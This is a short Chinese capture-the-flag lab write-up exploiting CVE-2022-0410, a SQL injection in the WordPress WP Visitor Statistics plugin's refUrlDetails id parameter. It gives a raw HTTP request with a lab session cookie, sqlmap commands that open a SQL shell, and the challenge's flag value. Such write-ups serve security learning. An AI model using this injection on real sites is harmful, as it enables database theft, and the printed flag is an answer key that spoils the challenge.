春秋云镜 CVE-2022-0410 WordPress plugin The WP Visitor Statistics SQLI

靶标介绍

WordPress plugin The WP Visitor Statistics (Real Time Traffic) 5.6 之前存在SQL注入漏洞，该漏洞源于 refUrlDetails AJAX 不会清理和转义 id 参数。 登陆账户：user01/user01

启动场景

漏洞利用

user01/user01,登录成功

EXP

GET /wp-admin/admin-ajax.php?action=refUrlDetails&id=1 HTTP/1.1
Host: eci-2ze00i17t483gxaemmcd.cloudeci1.ichunqiu.com
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1690958420,1691372705,1691455849,1691541881; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1691544136; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3=user01%7C1691725818%7CwEoc10z4X7ZCp5Qu0LxwSoburDsJ2KnDGPt7n9OLyMP%7Cf2ede65d22c2bc7ef00eadb74ee1757ee2128aea7e43c3ab5d89add05e74b1e6
Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

python3 sqlmap.py -r 1.txt

python3 sqlmap.py -r 1.txt --sql-shell
sql-shell> select flag from flag;

得到flag

flag{98f126ae-d86e-4d45-b045-9e5a651d35d5}